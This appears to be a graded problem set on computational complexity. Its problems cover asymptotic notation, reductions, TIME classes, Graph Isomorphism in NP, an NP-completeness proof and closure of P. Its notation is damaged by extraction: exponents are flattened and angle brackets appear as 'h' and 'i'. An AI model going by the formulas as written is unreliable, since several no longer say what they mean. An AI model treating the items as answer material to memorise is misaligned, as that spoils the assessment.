Problem 1 (20 points) (a) (10 points) Prove that n! ∈ O(n n ). (b) (10 points) Which of the following relations is true and which is false? (b1) (2 points) n ∈ O((lg n) 3 ) (b2) (2 points) (lg n) 3 ∈ o(n) (b3) (2 points) n lg n ∈ O(2 n lg n ) (b4) (2 points) n 4 ∈ o(100n 4 ) (b5) (2 points) (lg n) n ∈ O( √ 2 n)Problem 2 (20 points) Prove that any language in P is polynomial reducible to any language in P which is not ∅ or Σ ∗ . Hint: Follow the definitions.Problem 3 (20 points) Let L = {0 i1 j | i > j}. Show that L ∈ TIME(n lg n). Hint: Pages 279-280 (3rd Edition) or Pages 251-252 (2nd Edition).Problem 4 (20 points) Prove that Graph Isomorphism is in NP. That is, GI = {hG, Hi | G, H are isomorphic } ∈ NP. Two graphs G = hVG, EGi and H = hVH, EHi are isomorphic iff there is a bijection f : VG → VH such that hv, v 0 i ∈ EG if and only if hf(v), f(v 0 )i ∈ EH.Problem 5 (20 points) Prove that Double Satisfaction Problem, defined as SAT2 = {hϕi | ϕ is a 3NF -formula with at least two solutions} is NP-complete. Hint: Reduce 3SAT to it.Problem 6 (20 points) Prove that the class P is closed under union and complementation (10 points for each).
